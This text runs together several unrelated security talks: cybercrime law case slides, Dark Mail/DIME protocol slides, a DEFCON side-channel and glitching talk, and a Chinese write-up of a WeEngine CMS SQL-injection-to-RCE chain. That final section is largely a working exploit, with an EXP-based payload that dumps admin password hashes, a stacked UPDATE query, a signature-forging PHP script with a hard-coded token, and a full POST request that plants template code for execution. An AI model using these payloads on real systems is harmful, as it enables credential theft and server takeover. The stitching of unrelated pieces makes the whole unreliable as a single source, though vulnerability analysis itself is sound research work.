Looked up tax returns of a woman he dated, ADA prosecuting his father, etc. Charged with wire and computer fraud Charges dismissed – no evidence of scheme to defraud Denial of Service - 02/2000 Yahoo, Amazon, eBay, CNN & Buy.com were all attacked 15-year-old pled guilty to the attacks, which did an estimated $1.7 billion in damage 8 months in a juvenile detention center DDos Attack on GRC.Com “I just ddosed you,” Wicked, 13 Computer As Tool Fraud Theft Extortion Stalking Forgery Child pornography Other??? Theft: Citibank Vladimir Levin took responsibility for siphoning $10 million from Citibank and transferring it into foreign accounts Sentenced to 3 years in prison Identity Theft/Fraud Abraham Abdallah, a bus boy, stole the identifies of Oprah Winfrey, George Lucas, Ross Perot, etc. Transferred funds from their accounts to ones he set up using computers in public libraries Fake Escrow Sites Dentist Bruce Lachot sent $55,000 to an escrow site to buy a BMW from a German seller Fake site Lachot never got his BMW or his money back Fraud? Theft? Hacker fixes online casino’s server so people playing craps and slots could not lose Players won $1.9 million Others have done similar things, then demanded money not to repeat it Stalking a School 1999 – Massachusetts middle school is stalked by an unknown person Students, faculty, parents and the entire town are panicked Christian Hunold, a 20 year old paraplegic, eventually identified as the stalker The Nuremberg Files Black font (working) Grey font (wounded) Strikethrough (dead) http://www.christiangallery.com/atrocity JusticeFiles.org Philip C. Goguen, Kirkland Police officer This is a picture of Officer Goguen’s home. This is a map to Officer Goguen’s home. Computer Incidental Blackmailer uses computer to write blackmail letters Drug dealer stores records on computer Computer used to research murder methods Divergences Real-world crime and cybercrime differ in several respects Differences make it difficult to apply traditional principles of criminal law and law enforcement to cybercrime Real-world crime Proximity Limited Scale Physical constraints Patterns Real-world crime shaped law enforcement Reactive model Crime committed Investigation Apprehension Conviction Deterrence Crime controlled Cybercrime: proximity “In the networked world, no island is an island.” McConnell International, Cyber Crime . . . And Punishment Archaic Laws Threaten Global Information (2001). Proximity: example #1 Onel de Guzman, accused author of the “Love Bug” virus $10-$12 billion in damage in over 20 countries Not a crime in the Philippines, never prosecuted, anywhere Proximity: example #2 Attacked companies in 10 states Extorted money by threatening to sell stolen data/return and cause damage FBI identified Vasiliy Gorshkov and Alexey Ivanov as the hackers Gorshkov Ivanov Example #2 - continued Interview with Invita Used FBI laptop to access a Russian computer and demo hacking skills – arrested FBI used information obtained by a logger on the laptop to access the Russian computer and download evidence without a warrant Invita: Implications Cybercrime is transborder, transnational crime Russians would not assist FBI -- no MLAT in effect In August, the Federal Security Service charged an FBI agent with hacking Cybercrime: scale Thomas & Janice Reedy provided a gateway to child porn sites 350,000 subscribers (35,000 in US & 1,300 in the UK) Estimate: it takes 80 hours to process one computer, which is only part of prosecuting Physical constraints Anonymity Easier to avoid leaving trace evidence Crimes are committed quickly – more easily concealed Concealment: framing NY executive discovered email was being tapped Traced to former employee, Joe Smith, in St. Louis Smith said he did not do it Further investigation showed Fred Doe, former employee in Seattle, tapped email and framed Smith Cybercrime Patterns? Lack of accurate statistics No standard offense definitions Hard to parse a cybercrime into “offenses” – was the Love Bug one crime or thousands of crimes? Different Approaches Collaborative model – commercial Prevention (information sharing, etc.) Informal reporting of cybercrimes Reacting – private resources supplement law enforcement resources Legal issues Must private personnel abide by rules governing law enforcement? Permissibility of using private personnel in evidence-gathering Locus of the decision to prosecute Private Person case Person claiming to be Turkish hacker gives police evidence of child porn/molestation Investigation and arrests Turkish hacker agent of the police? U.S. v. Steiger, 318 F.2d 1039 (11th Cir. 2003) (no); U.S. v. v. Jarrett, 229 F. Supp.2d 503 (E.D. Va. 2002) (yes_ Shift Emerging model is a shift from a law enforcement, primarily reactive model, to a collaborative preventive- reactive model Emphasizes prevention because of the difficulties involved in reacting to cybercrime Expanding the Model Collaborative approach for individuals? Prevention? (Assumption of the risk?) Increased reporting? Reacting? Vigilantism? Victim reaction? Institute University of Dayton School of Law establishing new institute International Institute for Technology, Security and Law Cybercrime research, training, policy analysis Formal announcement in August Susan W. Brenner Susan.Brenner@notes.udayton.edu http://www.cybercrimes.net
Ladar Levison Stephen Watt What is Dark Mail? What is Dark Mail? What is DIME? Did you write down the formula? Dark Internet Mail Environment DIME Illustrated User Client DARPA NET DMAP DMTP Resolver Transport Signet Service Global Ledger (Optional) Dark Messages Server ] ] Signets Signets DNS Why Do We Need It? • Guilt by Association • Mass Surveillance (Gotta Love Backbone Slurping) • Service Provider (PRTT Orders, Search Warrants, NSLs, FISC Warrants) Goals • Message Confidentiality • Author Validation • Minimize Metadata Exposure • Automagical Key Management • Efficient Access from Multiple Clients • Deployment Flexibility Get everyone using it! The more people using it, the more valuable it becomes. How far will they go? How will they attack? Weak Points • DNS • Password Strength • Endpoint Security • Cryptographic Algorithms • Implementation Vulnerabilities • JavaScript Clients • For those addicted to Webmail * Warning: if the world adopts end-to-end cryptography for communications, then it’s only a matter of time – hardware will start shipping from the factory with a backdoor. Let’s Get Back to DIME Lead by Example DIME Management Record DIME Management Record DIME Management Record What is a Signet? Signet Header Byte 1: Signet Format Version Number Bytes 2-4: Length of the Signet (minus the 4 byte header) Defined Attributes Byte 1: Attribute Type (Signing key, Encryption Key, Org Signature, Etc.) Bytes 2-3: Value Length Bytes 4-X: Value Undefined Attributes Byte 1: Indicates Undefined Attribute Type (Value == 255) Byte 2: Name Length Bytes 3-N: Name Bytes (N+1)-(N+3): Value Length Bytes (N+4)-(N+4+X): Value * Because the overall length is 3 bytes, the maximum size of a Signet is 16 megabytes. Signet Construction Signet Construction Signet Construction Signet Construction Signet Construction Signet Construction Trust Model Signet resolver obtains a signet from an authoritative primary source and then validates it using a pre-authenticated secondary source. User Signet Org Signet Management Record RRSIG DS TLD Trust Model * Trust no one. You’ll live longer. Signet resolver obtains a signet from an authoritative primary source and then validates it using a pre-authenticated secondary source. User Signet Org Signet Management Record RRSIG DS TLD Registrar TLD Princess Message Header Content Tracing / Unencrypted Return-Path: <lavabit.com> Destination: <domain.tld> Destination-Key: [CD1ZS2B6ZpyfRiUeo63tJFc2Ca] Received: from lavabit.com ( by mail.domain.tld with DMTP id N5HHRJGSDW5T for <domain.tld>; Wed, 4 Jun 2014 13:37:02 -0500 Origin / ARO Author: <ladar@lavabit.com> Author-Key: [wREBqUxPadqBzSCodroFYScLOI] Destination: <domain.tld> Destination-Key: [CD1ZS2B6ZpyfRiUeo63tJFc2Ca] Destination / ARD Recipient: <president@domain.tld> Recipient-Key: [58+FsG1Y3n4SveTfX9PN68KoWS] Origin: <lavabit.com> Origin-Key: [VLbfEsXhxtSzHpu61bRW+iyXLR] Display / AR Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 8bit Mr. President, I’m afraid the ubiquitous adoption of dmail has made mass surveillance technologically impossible. Sincerely, Ladar Levison Common Fields / AR Date: Sat, 13 Jul 2013 03:15:42 -0500 From: Ladar Levison <ladar@lavabit.com> Organization: Lavabit LLC To: "President, Mister" <president@domain.tld> CC: "Snowden, Edward" <edward@example.com>, Subject: Hey, who turned out the lights? Other Fields / AR Message-ID: <51E1D787.2010201@lavabit.com> References: <6069AA0946F2602B@domain.tld> In-Reply-To: <6069AA0946F2602B@domain.tld> User-Agent: Volcano/1.2.8 Thread-Topic: Hey, who turned out the lights? Thread-Index: AbVQ9wJlc9KwLwQcsVw9lJHWFOzw9D== Accept-Language: en-US Content-Language: en-US X-MS-Has-Attach: X-MS-TNEF-Correlator: X-Nonspam: None Attachment / AR Content-Type: application/octet-stream; name="TOP-SECRET-SLURPEE-net-data-collection-sources.pdf" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="TOP-SECRET-SLURPEE-net-data-collection-sources.pdf" JVBERi0xLjcNJeLjz9MNCjQ1MCAwIG9iag08PC9MaW5lYXJpemVkIDEvTCAyMDk0M jUvTyA0NTIvRSAxNzA0Ni9OIDQxL1QgMjAwMzc3L0ggWyA2MzYgNzQ3XT4+DWVu ZG9iag0gICAgICAgICAgICAgDQp4cmVmDQo0NTAgMTcNCjAwMDAwMDAwMTYgM DAwMDAgbg0KMDAwMDAwMTM4MyAwMDAwMCBuDQowMDAwMDAxNDQ5ID AwMDAwIG4NCjAwMDAwMDE3MJSVFT0YNCg== Access Identifiers A = Author D = Destination O = Origin R = Recipient Signature Signatures User = Tree Signature (Combined Chunk Hashes) / Complete Content Signature Domain = Return Subset Signature (If Applicable) / Complete Content Signature Envelope Pseudo Onion Destination silentcircle.com Origin lavabit.com Author Recipient What the Origin Sees What the Destination Sees Fin
Don’t Whisper My Chips ColinOFlynn.com – DEFCON 2015. 1 Colin O’Flynn – Dalhousie University – Halifax, NS. Canada. Objective: Learn about all sorts of ‘physical’ layer attacks. Critical Difference: Everything I’m showing you is open source and freely available. Most of the hardware is commercially available (it’s difficult for hardware to be free), but you can DIY it too if you wish, or use existing tools (e.g. oscilloscope). www.NewAE.com Open Source Tools Posted to: www.ChipWhisperer.com ColinOFlynn.com – DEFCON 2015. 2 ColinOFlynn.com – DEFCON 2015. 3 ColinOFlynn.com – DEFCON 2015. 4 ColinOFlynn.com – DEFCON 2015. 5 ColinOFlynn.com – DEFCON 2015. 6 Embedded System: ColinOFlynn.com – DEFCON 2015. 8 Not an Embedded System: unsigned char correctpin[6] = {1,2,3,4,5,6}; unsigned char enteredpin[6]; read_pin_from_buttons(enteredpin); for (i = 0; i < 6; i++){ if (correctpin[i] != enteredpin[i]){ return; } } ColinOFlynn.com – DEFCON 2015. 10 ColinOFlynn.com – DEFCON 2015. 11 ColinOFlynn.com – DEFCON 2015. 12 • Important: Must discover when microcontroller detects button press, not when user presses button • Need to do some slight reverse-engineering to discover if using multiplexing, how often polling of buttons, etc ColinOFlynn.com – DEFCON 2015. 13 ColinOFlynn.com – DEFCON 2015. 14 ColinOFlynn.com – DEFCON 2015. 15 • Don’t compare input directly to saved password • Ideally: use hashes, also prevents attacker from reading out memory • Don’t give any response when ‘wrong’ • No timing information ‘easily’ available • Depends how you define ‘easily’ though…. ColinOFlynn.com – DEFCON 2015. 16 • TinySafeBoot (TSB) is Awesome Bootloader for AVRs • See http://jtxp.org/tech/tinysafeboot_en.htm • DOES NOT claim any sort of cryptographic protection • BUT – What if someone uses it expecting it to be ‘secure’? ColinOFlynn.com – DEFCON 2015. 17 CheckPW: chpw1: lpm tmp3, z+ ; load character from Flash cpi tmp3, 255 ; byte value (255) indicates breq chpwx ; end of password -> okay rcall Receivebyte ; else receive next character chpw2: cp tmp3, tmp1 ; compare with password breq chpw1 ; if equal check next character cpi tmp1, 0 ; or was it 0 (emergency erase) chpwl: brne chpwl ; if not, loop infinitely rcall RequestConfirmation ; if yes, request confirm brts chpa ; not confirmed, leave rcall RequestConfirmation ; request 2nd confirm brts chpa ; can't be mistake now rcall EmergencyErase ; go, emergency erase! rjmp Mainloop chpa: rjmp APPJUMP ; start application chpwx: ; rcall SendDeviceInfo ColinOFlynn.com – DEFCON 2015. 18 ColinOFlynn.com – DEFCON 2015. 19 ColinOFlynn.com – DEFCON 2015. 20 ColinOFlynn.com – DEFCON 2015. 21 • 256 x N guesses required, can reduce this if password comes from ASCII-printable characters • Even if N=256 (very long password!), and can attempt only 1/second, still breakable in <24 hours ColinOFlynn.com – DEFCON 2015. 22 ColinOFlynn.com – DEFCON 2015. 25 ColinOFlynn.com – DEFCON 2015. 26 88 ⨁ EF = 67 56 ⨁ EF = B9 32 ⨁ EF = DD 𝐴6 ⨁ EF = 49 35 ⨁ EF = DA 5 5 6 3 5 HW observations Assume user is ‘encrypting’ a 1-byte piece of data by XORing with a 1-byte secret key (EF), and we cannot observe output of XOR. This becomes: Of course our ACTUAL observations are… 88 ⨁ XX = ? 56 ⨁ XX = ? 32 ⨁ XX = ? 𝐴6 ⨁ XX = ? 35 ⨁ XX = ? 5 5 6 3 5 HW observations Guess each possibility for key, check what gets actual HW we observed 88 ⨁ 00 = 88 56 ⨁ 00 = 56 32 ⨁ 00 = 32 𝐴6 ⨁ 00 = A6 35 ⨁ 00 = 35 2 4 3 4 4 HW Hypothesis Guess each possibility for key, check what gets actual HW we observed 88 ⨁ 01 = 89 56 ⨁ 01 = 57 32 ⨁ 01 = 33 𝐴6 ⨁ 01 = A7 35 ⨁ 01 = 34 3 5 4 5 3 HW Hypothesis Assume user is ‘encrypting’ a 1-byte piece of data by XORing with a 1-byte secret key (EF), and we cannot observe output of XOR. Observed Result? 88 ⨁ EF = 67 56 ⨁ EF = B9 32 ⨁ EF = DD 𝐴6 ⨁ EF = 49 35 ⨁ EF = DA 5 5 6 3 5 HW Substitution-Box (Lookup Table) 1-Byte of Input (Plaintext) 1-Byte of Key (Subkey) Bitwise XOR ColinOFlynn.com – DEFCON 2015. 34 ColinOFlynn.com – DEFCON 2015. 35 Tutorial: http://newae.com/sidechannel/cwdocs/tutorialaes256boot.html Paper (CCECE 2015): https://eprint.iacr.org/2014/899.pdf ColinOFlynn.com – DEFCON 2015. 36 ColinOFlynn.com – DEFCON 2015. 37 ColinOFlynn.com – DEFCON 2015. 38 ColinOFlynn.com – DEFCON 2015. 39 ColinOFlynn.com – DEFCON 2015. 40 ColinOFlynn.com – DEFCON 2015. 41 ColinOFlynn.com – DEFCON 2015. 42 http://eprint.iacr.org/2015/529 802.15.4 Node ZigBee (ZigBee IP, ZigBee Pro, RF4CE, etc.) WirelessHART MiWi ISA100.11a 6LoWPAN Nest Weave JenNet Thread Atmel Lightweight Mesh IEEE 802.15.5 DigiMesh ColinOFlynn.com – DEFCON 2015. 43 ColinOFlynn.com – DEFCON 2015. 44 1. Validate headers and security options. 2. Check that the received frame counter is numerically greater than the last stored frame count. 3. Look up the secret key based on message address and/or key index. 4. Decrypt the payload (and MAC if present). 5. Validate the MAC (if present). 6. Store the frame counter. IEEE 802.15.4 Wireless Stack: Frame Decryption Procedure: ColinOFlynn.com – DEFCON 2015. 45 Input to AES Block ColinOFlynn.com – DEFCON 2015. 46 ColinOFlynn.com – DEFCON 2015. 47 ColinOFlynn.com – DEFCON 2015. 49 ColinOFlynn.com – DEFCON 2015. 50 ColinOFlynn.com – DEFCON 2015. 51 ColinOFlynn.com – DEFCON 2015. 52 ColinOFlynn.com – DEFCON 2015. 53 ColinOFlynn.com – DEFCON 2015. 54 linux-util-2.24 ColinOFlynn.com – DEFCON 2015. 55 /* * auth.c -- PAM authorization code, common between chsh and chfn * (c) 2012 by Cody Maloney <cmaloney@theoreticalchaos.com> * * this program is free software. you can redistribute it and * modify it under the terms of the gnu general public license. * there is no warranty. * */ #include "auth.h" #include "pamfail.h" int auth_pam(const char *service_name, uid_t uid, const char *username) { if (uid != 0) { pam_handle_t *pamh = NULL; struct pam_conv conv = { misc_conv, NULL }; int retcode; retcode = pam_start(service_name, username, &conv, &pamh); if (pam_fail_check(pamh, retcode)) return FALSE; retcode = pam_authenticate(pamh, 0); if (pam_fail_check(pamh, retcode)) return FALSE; retcode = pam_acct_mgmt(pamh, 0); if (retcode == PAM_NEW_AUTHTOK_REQD) retcode = pam_chauthtok(pamh, PAM_CHANGE_EXPIRED_AUTHTOK); if (pam_fail_check(pamh, retcode)) return FALSE; retcode = pam_setcred(pamh, 0); if (pam_fail_check(pamh, retcode)) return FALSE; pam_end(pamh, 0); /* no need to establish a session; this isn't a * session-oriented activity... */ } return TRUE; } ColinOFlynn.com – DEFCON 2015. 56 <Clock Glitching Movie> ColinOFlynn.com – DEFCON 2015. 57 ColinOFlynn.com – DEFCON 2015. 59 int i,j,count; while(1){ count = 0; for (j = 0; j < 5000; j++){ for (i = 0; i < 5000; i++){ count++; } } printf("%d %d %d\n", count, i, j); } ColinOFlynn.com – DEFCON 2015. 60 ColinOFlynn.com – DEFCON 2015. 61 ColinOFlynn.com – DEFCON 2015. 62 ColinOFlynn.com – DEFCON 2015. 63 ColinOFlynn.com – DEFCON 2015. 64 ColinOFlynn.com – DEFCON 2015. 65 ColinOFlynn.com – DEFCON 2015. 66 120MHz glitch clock (mul = 4, div = 1) 38 Cycles of clock being glitched = 315nS glitch <Rapberry Pi Movie> ColinOFlynn.com – DEFCON 2015. 67 <Android Movie> ColinOFlynn.com – DEFCON 2015. 68 ColinOFlynn.com – DEFCON 2015. 70 ColinOFlynn.com – DEFCON 2015. 72 ColinOFlynn.com – DEFCON 2015. 73 ColinOFlynn.com – DEFCON 2015. 74 ColinOFlynn.com – DEFCON 2015. 75 ColinOFlynn.com – DEFCON 2015. 76 ColinOFlynn.com - HTCIA 2014. Halifax, NS 77 ColinOFlynn.com – DEFCON 2015. 78 ColinOFlynn.com – DEFCON 2015. 79 ColinOFlynn.com – DEFCON 2015. 80 ColinOFlynn.com – DEFCON 2015. 81 ColinOFlynn.com – DEFCON 2015. 82 Find those tools: www.ChipWhisperer.com Find me: www.OFlynn.com Buy Stuff: www.newae.com Twitter: @colinoflynn Email: coflynn@newae.com ColinOFlynn.com – DEFCON 2015. 83
微擎 CMS:从 SQL 到 RCE 0x01 写在前⾯ 微擎 CMS 在 2.0 版本的时候悄咪咪修复了⼀处 SQL 注⼊漏洞: api.php 536 ⾏ 该处的注⼊漏洞⽹上没有出现过分析⽂章,因此本⽂就来分析⼀下该处 SQL 注⼊的利⽤。 0x02 影响版本 经过测试发现,官⽹在 GitLee 上,在 v1.5.2 存在此漏洞,在 2.0 版本修复了该漏洞,因此 ⽬测⾄少影响到 v1.5.2 版本 0x03 SQL 注⼊漏洞分析 这个注⼊漏洞分析还是⽐较简单的,直接定位到存在漏洞的代码处 api.php 530 ⾏开始、 564 ⾏开始的两个函数: private function analyzeSubscribe(&$message) { global $_W; $params = array(); $message['type'] = 'text'; $message['redirection'] = true; if(!empty($message['scene'])) { $message['source'] = 'qr'; $sceneid = trim($message['scene']); $scene_condition = ''; if (is_numeric($sceneid)) { $scene_condition = " `qrcid` = '{$sceneid}'"; }else{ $scene_condition = " `scene_str` = '{$sceneid}'"; } $qr = pdo_fetch("SELECT `id`, `keyword` FROM " . tablename('qrcode') . " WHERE {$scene_condition} AND `uniacid` = '{$_W['uniacid']}'"); if(!empty($qr)) { $message['content'] = $qr['keyword']; if (!empty($qr['type']) && $qr['type'] == 'scene') { $message['msgtype'] = 'text'; } $params += $this->analyzeText($message); return $params; } } $message['source'] = 'subscribe'; $setting = uni_setting($_W['uniacid'], array('welcome')); if(!empty($setting['welcome'])) { $message['content'] = $setting['welcome']; $params += $this->analyzeText($message); } return $params; } private function analyzeQR(&$message) { global $_W; $params = array(); 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 $params = $this->handler($message['type']); if (!empty($params)) { return $params; } $message['type'] = 'text'; $message['redirection'] = true; if(!empty($message['scene'])) { $message['source'] = 'qr'; $sceneid = trim($message['scene']); $scene_condition = ''; if (is_numeric($sceneid)) { $scene_condition = " `qrcid` = '{$sceneid}'"; }else{ $scene_condition = " `scene_str` = '{$sceneid}'"; } $qr = pdo_fetch("SELECT `id`, `keyword` FROM " . tablename('qrcode') . " WHERE {$scene_condition} AND `uniacid` = '{$_W['uniacid']}'"); } if (empty($qr) && !empty($message['ticket'])) { $message['source'] = 'qr'; $ticket = trim($message['ticket']); if(!empty($ticket)) { $qr = pdo_fetchall("SELECT `id`, `keyword` FROM " . tablename('qrcode') . " WHERE `uniacid` = '{$_W['uniacid']}' AND ticket = '{$ticket}'"); if(!empty($qr)) { if(count($qr) != 1) { $qr = array(); } else { $qr = $qr[0]; } } } } if(!empty($qr)) { $message['content'] = $qr['keyword']; if (!empty($qr['type']) && $qr['type'] == 'scene') { 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 在 analyzeSubscribe 函数中的 SQL 语句: 直接将 $scene_condition 变量拼接到了 pod_fetch 函数中,⽽ $scene_condition 变量 值来⾃于 $sceneid = trim($message['scene']); ,可以看到仅仅是做了移除字符串两 侧空⽩字符处理。那么就可以通过构造 $message['scene'] 的值,去构造 SQL 语句。 在 analyzeQR 函数中也是类似,因此我们以 analyzeSubscribe 函数为例来分析构造poc。 0x04 SQL 注⼊构造分析 微擎中为了避免 SQL注⼊,实现了包括参数化查询、关键字&字符过滤的⽅式。 过滤的内容如下: framework/class/db.class.php 700 ⾏: $message['msgtype'] = 'text'; } $params += $this->analyzeText($message); } return $params; } 73 74 75 76 77 78 $qr = pdo_fetch("SELECT `id`, `keyword` FROM " . tablename('qrcode') . " WHERE {$scene_condition} AND `uniacid` = '{$_W['uniacid']}'"); 1 private static $disable = array( 'function' => array('load_file', 'floor', 'hex', 'substring', 'if', 'ord', 'char', 'benchmark', 'reverse', 'strcmp', 'datadir', 'updatexml', 'extractvalue', 'name_const', 'multipoint', 'database', 'user'), 'action' => array('@', 'intooutfile', 'intodumpfile', 'unionselect', 'uniondistinct', 'information_schema', 'current_user', 'current_date'), 'note' => array('/*', '*/', '#', '--'), ); 1 2 3 4 5 可以看到禁⽤了以下函数: load_file、floor、hex、substring、if、ord、char、benchmark、reverse、reverse、strcmp、 datadir、datadir、updatexml、extractvalue、name_const、multipoint、database、user 禁⽤了以下关键字: @、into outfile、into dumpfile、union select、union all、union distinct、 information_schema、current_user、current_date 禁⽤了以下注释符: /* 、 */ 、 -- 、 # 所以对于构造 payload 来说还是造成了⼀定的⿇烦。 ⾸先将函数中 SQL 语句还原如下: 那么如果我们想查询到管理员账号密码且不包含相关敏感字符,则可以使⽤ exp语句,如下⽰ 例: 具体构建由于本地 MySQL 版本不合适,因此就不写了。 这⾥来说下另⼀种注⼊⽅式。 我们知道微擎⾥的 SQL 语句使⽤的是 PDO 查询,因此⽀持堆叠注⼊。 但要注意的是,使⽤ PDO 执⾏ SQL 语句时,虽然可以执⾏多条 SQL语句,但只会返回第⼀ 条 SQL 语句的执⾏结果,所以第⼆条语句中需要使⽤ update 更新数据且该数据我们可以通过 页⾯看到,这样才可以获取数据。 SELECT `id`, `keyword` FROM ims_qrcode where `scene_str` = ? and uniacid = $_W['uniacid']; 1 SELECT `id`, `keyword` FROM ims_qrcode where `scene_str` = 1 AND(EXP(~ (SELECT*from(select group_concat(0x7B,uid,0x23,password,0x23,salt,0x23,lastvisit,0x23,lasti p,0x7D) from we7.ims_users)a))) and uniacid = $_W['uniacid']; 1 经过测试发现,微擎⽀持注册⽤户,如下图所⽰: 登陆后可以在个⼈中⼼看到: 邮寄地址就是⼀个很好的显⽰地⽅,也就是说可以执⾏以下语句。 语句中的 2 是注册后账号的uid,可以从 cookie中找到: 但是这⾥有⼀个问题,就是在我们注⼊的时候,⾸先要验证: api.php 181⾏: 跟进 checkSign() : update ims_users_profile set address=(select username from ims_users where uid =1 ) where uid=2; 1 if(empty($this->account)) { exit('Miss Account.'); } if(!$this->account->checkSign()) { exit('Check Sign Fail.'); } 1 2 3 4 5 6 可以看到有三个变量需要我们去验证,其⽣成规则在 api.php 129 ⾏的 encrypt 函数,如 下: public function checkSign() { $arrParams = array( $token = $this->account['token'], $intTimeStamp = $_GET['timestamp'], $strNonce = $_GET['nonce'], ); sort($arrParams, SORT_STRING); $strParam = implode($arrParams); $strSignature = sha1($strParam); return $strSignature == $_GET['signature']; } 1 2 3 4 5 6 7 8 9 10 11 12 13 public function encrypt() { global $_W; if(empty($this->account)) { exit('Miss Account.'); } $timestamp = TIMESTAMP; $nonce = random(5); $token = $_W['account']['token']; $signkey = array($token, TIMESTAMP, $nonce); sort($signkey, SORT_STRING); $signString = implode($signkey); $signString = sha1($signString); $_GET['timestamp'] = $timestamp; $_GET['nonce'] = $nonce; $_GET['signature'] = $signString; $postStr = file_get_contents('php://input'); if(!empty($_W['account']['encodingaeskey']) && strlen($_W['account']['encodingaeskey']) == 43 && !empty($_W['account'] ['key']) && $_W['setting']['development'] != 1) { 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 其中 timestamp 是时间戳、 nonce 是5 位随机字符串、 signature 是由 sha1加密后的 $signString ,⽽ $signString 是由 token 、 timestamp 、 nonce 组成。可以看到,是 硬编码⽣成,因此可以通过 print_r($_W) 得到 token 值,如下: $data = $this->account->encryptMsg($postStr); $array = array('encrypt_type' => 'aes', 'timestamp' => $timestamp, 'nonce' => $nonce, 'signature' => $signString, 'msg_signature' => $data[0], 'msg' => $data[1]); } else { $data = array('', ''); $array = array('encrypt_type' => '', 'timestamp' => $timestamp, 'nonce' => $nonce, 'signature' => $signString, 'msg_signature' => $data[0], 'msg' => $data[1]); } exit(json_encode($array)); } 19 20 21 22 23 24 25 26 所以可以利⽤以下代码⽣成: <?php $timestamp = time(); $nonce = random(5); $token = "omJNpZEhZeHj1ZxFECKkP48B5VFbk1HP"; $signkey = array($token, $timestamp, $nonce); sort($signkey, SORT_STRING); $signString = implode($signkey); $signString = sha1($signString); 1 2 3 4 5 6 7 8 得到: 然后根据官⽹⽂档中的消息格式: 所以最终的 payload 为: echo $timestamp . " | ".$nonce." | ".$signString; function random($length) { $strs = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklnmopqrstuvwxyz0123456789'; $result = substr(str_shuffle($strs),mt_rand(0,strlen($strs)- ($length + 1)),$length); return $result; } ?> 9 10 11 12 13 14 15 1622388248 | SATNv | d886b80d868b6fb1038c77f1f26ae5f2891a3b22 1 最终在个⼈中⼼可以看到: 但是这种⽅式⽐较鸡肋和费事,⼀是解密⾮常难,⼆是如果直接添加账号也会留下很多痕 迹,三是即是登录后,还要拿 shell。 那么有没有⼀步到位的⽅法? 0x05 从 SQL 到 RCE /app/source/home/page.ctrl.php ⽂件: ⾸先判断 $do 的类型,如果不是 getnum 和 addnum 时,进⼊ template_page 函数。 跟进 /app/common/template.func.php 111⾏: $do = in_array($do, $dos) ? $do : 'index'; $id = intval($_GPC['id']); if($do == 'getnum'){ $goodnum = pdo_get('site_page', array('id' => $id), array('goodnum')); message(error('0', array('goodnum' => $goodnum['goodnum'])), '', 'ajax'); } elseif($do == 'addnum'){ if(!isset($_GPC['__havegood']) || (!empty($_GPC['__havegood']) && !in_array($id, $_GPC['__havegood']))) { $goodnum = pdo_get('site_page', array('id' => $id), array('goodnum')); if(!empty($goodnum)){ $updatesql = pdo_update('site_page', array('goodnum' => $goodnum['goodnum'] + 1), array('id' => $id)); if(!empty($updatesql)) { isetcookie('__havegood['.$id.']', $id, 86400*30*12); message(error('0', ''), '', 'ajax'); }else { message(error('1', ''), '', 'ajax'); } } } } else { $footer_off = true; template_page($id); } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 function template_page($id, $flag = TEMPLATE_DISPLAY) { global $_W; $page = pdo_fetch("SELECT * FROM ".tablename('site_page')." WHERE id = :id LIMIT 1", array(':id' => $id)); if (empty($page)) { return error(1, 'Error: Page is not found'); } if (empty($page['html'])) { return ''; } $page['html'] = str_replace(array('<?', '<%', '<?php', '{php'), '_', $page['html']); $page['html'] = preg_replace('/<\s*?script.*(src|language)+/i', '_', $page['html']); $page['params'] = json_decode($page['params'], true); $GLOBALS['title'] = htmlentities($page['title'], ENT_QUOTES, 'UTF- 8'); $GLOBALS['_share'] = array('desc' => $page['description'], 'title' => $page['title'], 'imgUrl' => tomedia($page['params']['0']['params'] ['thumb']));; $compile = IA_ROOT . "/data/tpl/app/{$id}.{$_W['template']}.tpl.php"; $path = dirname($compile); if (!is_dir($path)) { load()->func('file'); mkdirs($path); } $content = template_parse($page['html']); if (!empty($page['params'][0]['params']['bgColor'])) { $content .= '<style>body{background-color:'.$page['params'][0] ['params']['bgColor'].' !important;}</style>'; } $GLOBALS['bottom_menu'] = $page['params'][0]['property'][0]['params'] ['bottom_menu']; file_put_contents($compile, $content); switch ($flag) { case TEMPLATE_DISPLAY: default: extract($GLOBALS, EXTR_SKIP); 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 ⾸先根据 id 从 ims_site_page 数据表⾥读取页⾯信息,然后过滤掉敏感信息,最后通过 file_put_contents 写⼊到 $compile ,然后在 switch 中被包含 include $compile; 。 因此我们可以利⽤ SQL 注⼊,向 ims_site_page 表中插⼊⼀句话数据。如下: template('common/header'); include $compile; template('common/footer'); break; case TEMPLATE_FETCH: extract($GLOBALS, EXTR_SKIP); ob_clean(); ob_start(); include $compile; $contents = ob_get_contents(); ob_clean(); return $contents; break; case TEMPLATE_INCLUDEPATH: return $compile; break; } } 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 POST /wq/new/api.php? id=1&timestamp=1622388248&nonce=SATNv&signature=d886b80d868b6fb1038c77f 1f26ae5f2891a3b22 HTTP/1.1 Host: Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/ webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 1 2 3 4 5 6 7 这⾥的模板内容PHP 代码可以参考:PHP 语句 然后根据官⽹⽂档路由介绍: Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7 Connection: close Content-Length: 440 <xml> <ToUserName>one</ToUserName> <FromUserName>two</FromUserName> <CreateTime>1348831806</CreateTime> <MsgType>qr</MsgType> <Content>test</Content> <type>text</type> <Event>hello</Event> <scene>test';insert into ims_site_page(id,uniacid,multiid,title,description,params,html,multipag e,type,status,createtime,goodnum) values(1,1,1,'4','5','[{"params": {"thumb":""}}]','{if phpinfo())?>//}','8','9','10','11','12');</scene> </xml> 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 则有: 成功执⾏代码 0x06 漏洞修复 这个漏洞主要就是由 SQL 注⼊引起的,因此修复 SQL 注⼊后,后续的包含也没法继续利⽤ 了。 